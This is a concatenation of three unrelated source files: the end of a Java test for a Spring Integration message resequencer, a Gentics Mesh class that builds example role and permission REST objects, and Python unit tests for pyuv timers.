IntegrationMessageHeaderAccessor(discard1).getSequenceNumber()).isEqualTo(1); assertThat(discard2).isNull(); } @Test public void testResequencingWithWrongSequenceSizeAndNumber() { QueueChannel discardChannel = new QueueChannel(); Message<?> message1 = createMessage("123", "ABC", 2, 4, null); this.resequencer.setSendPartialResultOnExpiry(false); this.resequencer.setDiscardChannel(discardChannel); this.resequencer.handleMessage(message1); // this.resequencer.discardBarrier(this.resequencer.barriers.get("ABC")); Message<?> reply1 = discardChannel.receive(0); // No message has been received - the message has been rejected. assertThat(reply1).isNull(); } @Test public void testResequencingWithCompleteSequenceRelease() { QueueChannel replyChannel = new QueueChannel(); Message<?> message1 = createMessage("123", "ABC", 4, 2, replyChannel); Message<?> message2 = createMessage("456", "ABC", 4, 1, replyChannel); Message<?> message3 = createMessage("789", "ABC", 4, 4, replyChannel); Message<?> message4 = createMessage("XYZ", "ABC", 4, 3, replyChannel); this.resequencer.handleMessage(message1); this.resequencer.handleMessage(message2); this.resequencer.handleMessage(message3); Message<?> reply1 = replyChannel.receive(0); Message<?> reply2 = replyChannel.receive(0); Message<?> reply3 = replyChannel.receive(0); // no messages should have been received yet assertThat(reply1).isNull(); assertThat(reply2).isNull(); assertThat(reply3).isNull(); // after sending the last message, the whole sequence should have been sent this.resequencer.handleMessage(message4); reply1 = replyChannel.receive(0); reply2 = replyChannel.receive(0); reply3 = replyChannel.receive(0); Message<?> reply4 = replyChannel.receive(0); assertThat(reply1).isNotNull(); assertThat(new IntegrationMessageHeaderAccessor(reply1).getSequenceNumber()).isEqualTo(1); assertThat(reply2).isNotNull(); assertThat(new IntegrationMessageHeaderAccessor(reply2).getSequenceNumber()).isEqualTo(2); assertThat(reply3).isNotNull(); assertThat(new IntegrationMessageHeaderAccessor(reply3).getSequenceNumber()).isEqualTo(3); assertThat(reply4).isNotNull(); assertThat(new IntegrationMessageHeaderAccessor(reply4).getSequenceNumber()).isEqualTo(4); } @Test public void testRemovalOfBarrierWhenLastMessageOfSequenceArrives() { QueueChannel replyChannel = new QueueChannel(); String correlationId = "ABC"; Message<?> message1 = createMessage("123", correlationId, 1, 1, replyChannel); resequencer.handleMessage(message1); assertThat(store.getMessageGroup(correlationId).size()).isEqualTo(0); } @Test public void testTimeoutDefaultExpiry() { this.resequencer.setGroupTimeoutExpression(new SpelExpressionParser().parseExpression("100")); ThreadPoolTaskScheduler taskScheduler = new ThreadPoolTaskScheduler(); taskScheduler.afterPropertiesSet(); this.resequencer.setTaskScheduler(taskScheduler); QueueChannel discardChannel = new QueueChannel(); this.resequencer.setDiscardChannel(discardChannel); QueueChannel replyChannel = new QueueChannel(); this.resequencer.setOutputChannel(replyChannel); Message<?> message3 = createMessage("789", "ABC", 3, 3, null); Message<?> message2 = createMessage("456", "ABC", 3, 2, null); this.resequencer.handleMessage(message3); this.resequencer.handleMessage(message2); Message<?> out1 = replyChannel.receive(10); assertThat(out1).isNull(); out1 = discardChannel.receive(20000); assertThat(out1).isNotNull(); Message<?> out2 = discardChannel.receive(10); assertThat(out2).isNotNull(); Message<?> message1 = createMessage("123", "ABC", 3, 1, null); this.resequencer.handleMessage(message1); Message<?> out3 = discardChannel.receive(0); assertThat(out3).isNotNull(); } @Test public void testTimeoutDontExpire() { this.resequencer.setGroupTimeoutExpression(new SpelExpressionParser().parseExpression("100")); ThreadPoolTaskScheduler taskScheduler = new ThreadPoolTaskScheduler(); taskScheduler.afterPropertiesSet(); this.resequencer.setTaskScheduler(taskScheduler); QueueChannel discardChannel = new QueueChannel(); this.resequencer.setDiscardChannel(discardChannel); QueueChannel replyChannel = new QueueChannel(); this.resequencer.setOutputChannel(replyChannel); this.resequencer.setExpireGroupsUponTimeout(true); Message<?> message3 = createMessage("789", "ABC", 3, 3, null); Message<?> message2 = createMessage("456", "ABC", 3, 2, null); this.resequencer.handleMessage(message3); this.resequencer.handleMessage(message2); Message<?> out1 = replyChannel.receive(0); assertThat(out1).isNull(); out1 = discardChannel.receive(20_000); assertThat(out1).isNotNull(); Message<?> out2 = discardChannel.receive(10_000); assertThat(out2).isNotNull(); Message<?> message1 = createMessage("123", "ABC", 3, 1, null); this.resequencer.handleMessage(message1); Message<?> out3 = discardChannel.receive(0); assertThat(out3).isNull(); out3 = discardChannel.receive(10_000); assertThat(out3).isNotNull(); } private static Message<?> createMessage(String payload, Object correlationId, int sequenceSize, int sequenceNumber, MessageChannel replyChannel) { return MessageBuilder.withPayload(payload) .setCorrelationId(correlationId) .setSequenceSize(sequenceSize) .setSequenceNumber(sequenceNumber) .setReplyChannel(replyChannel) .build(); } }
6,029
563
package com.gentics.mesh.example; import static com.gentics.mesh.core.rest.common.Permission.CREATE; import static com.gentics.mesh.core.rest.common.Permission.DELETE; import static com.gentics.mesh.core.rest.common.Permission.PUBLISH; import static com.gentics.mesh.core.rest.common.Permission.READ; import static com.gentics.mesh.core.rest.common.Permission.READ_PUBLISHED; import static com.gentics.mesh.core.rest.common.Permission.UPDATE; import static com.gentics.mesh.example.ExampleUuids.GROUP_CLIENT_UUID; import static com.gentics.mesh.example.ExampleUuids.GROUP_EDITORS_UUID; import static com.gentics.mesh.example.ExampleUuids.ROLE_ADMIN_UUID; import static com.gentics.mesh.example.ExampleUuids.ROLE_CLIENT_UUID; import java.util.ArrayList; import java.util.List; import com.gentics.mesh.core.rest.group.GroupReference; import com.gentics.mesh.core.rest.role.RoleCreateRequest; import com.gentics.mesh.core.rest.role.RoleListResponse; import com.gentics.mesh.core.rest.role.RolePermissionRequest; import com.gentics.mesh.core.rest.role.RolePermissionResponse; import com.gentics.mesh.core.rest.role.RoleResponse; import com.gentics.mesh.core.rest.role.RoleUpdateRequest; public class RoleExamples extends AbstractExamples { public RoleResponse getRoleResponse1(String name) { RoleResponse role = new RoleResponse(); role.setName(name); role.setCreated(createOldTimestamp()); role.setCreator(createUserReference()); role.setEdited(createNewTimestamp()); role.setEditor(createUserReference()); role.setPermissions(READ, UPDATE, DELETE, CREATE); role.setUuid(ROLE_CLIENT_UUID); return role; } public RolePermissionRequest getRolePermissionRequest() { RolePermissionRequest request = new RolePermissionRequest(); request.setRecursive(false); request.getPermissions().set(CREATE, true); request.getPermissions().set(READ, true); request.getPermissions().set(UPDATE, true); request.getPermissions().set(DELETE, true); request.getPermissions().set(READ_PUBLISHED, false); request.getPermissions().set(PUBLISH, false); return request; } public RolePermissionResponse getRolePermissionResponse() { RolePermissionResponse response = new RolePermissionResponse(); response.set(CREATE, true); response.set(READ, true); response.set(UPDATE, true); response.set(DELETE, true); response.set(READ_PUBLISHED, false); response.set(PUBLISH, false); return response; } public RoleResponse getRoleResponse2() { RoleResponse role = new RoleResponse(); role.setName("Admin role"); role.setUuid(ROLE_ADMIN_UUID); role.setCreated(createOldTimestamp()); role.setCreator(createUserReference()); role.setEdited(createNewTimestamp()); role.setEditor(createUserReference()); role.setPermissions(READ, UPDATE, DELETE, CREATE); List<GroupReference> groups = new ArrayList<>(); groups.add(new GroupReference().setName("editors").setUuid(GROUP_EDITORS_UUID)); groups.add(new GroupReference().setName("clients").setUuid(GROUP_CLIENT_UUID)); role.setGroups(groups); return role; } public RoleListResponse getRoleListResponse() { RoleListResponse list = new RoleListResponse(); list.getData().add(getRoleResponse1("Reader role")); list.getData().add(getRoleResponse2()); setPaging(list, 1, 10, 2, 20); return list; } public RoleUpdateRequest getRoleUpdateRequest(String name) { RoleUpdateRequest roleUpdate = new RoleUpdateRequest(); roleUpdate.setName(name); return roleUpdate; } public RoleCreateRequest getRoleCreateRequest(String name) { RoleCreateRequest roleCreate = new RoleCreateRequest(); roleCreate.setName(name); return roleCreate; } }
1,230
826
<reponame>farisachugthai/pyuv<filename>tests/test_timer.py import unittest import warnings from common import TestCase import pyuv class TimerTest(TestCase): def test_timer1(self): self.timer_cb_called = 0 def timer_cb(timer): self.timer_cb_called += 1 timer.stop() timer.close() timer = pyuv.Timer(self.loop) timer.start(timer_cb, 0.1, 0) self.loop.run() self.assertEqual(self.timer_cb_called, 1) def test_timer_never(self): self.timer_cb_called = 0 def timer_cb(timer): self.timer_cb_called += 1 timer.stop() timer.close() timer = pyuv.Timer(self.loop) timer.start(timer_cb, 0.1, 0) timer.close() self.loop.run() self.assertEqual(self.timer_cb_called, 0) def test_timer_ref1(self): self.timer_cb_called = 0 def timer_cb(timer): self.timer_cb_called += 1 timer.stop() timer.close() self.timer = pyuv.Timer(self.loop) self.loop.run() self.assertEqual(self.timer_cb_called, 0) def test_timer_ref2(self): self.timer_cb_called = 0 def timer_cb(timer): self.timer_cb_called += 1 timer.stop() timer.close() self.timer = pyuv.Timer(self.loop) self.timer.start(timer_cb, 0.1, 0) self.timer.ref = False self.loop.run() self.assertEqual(self.timer_cb_called, 0) self.timer.ref = True self.loop.run() self.assertEqual(self.timer_cb_called, 1) def test_timer_noref(self): self.timer_cb_called = 0 def timer_cb(timer): self.timer_cb_called += 1 timer.close() t = pyuv.Timer(self.loop) t.start(timer_cb, 0.1, 0) t = None self.loop.run() self.assertEqual(self.timer_cb_called, 1) def test_timer_submillisecond(self): self.timer_cb_called = 0 def timer_cb(timer): self.timer_cb_called += 1 timer.close() t = pyuv.Timer(self.loop) with warnings.catch_warnings(record=True) as w: # Cause all warnings to always be triggered warnings.simplefilter('always') t.start(timer_cb, 0.00001, 0) self.assertEqual(len(w), 1) self.assertTrue(issubclass(w[0].category, RuntimeWarning)) self.loop.run() self.assertEqual(self.timer_cb_called, 1) if __name__ == '__main__': unittest.main(verbosity=2)
1,314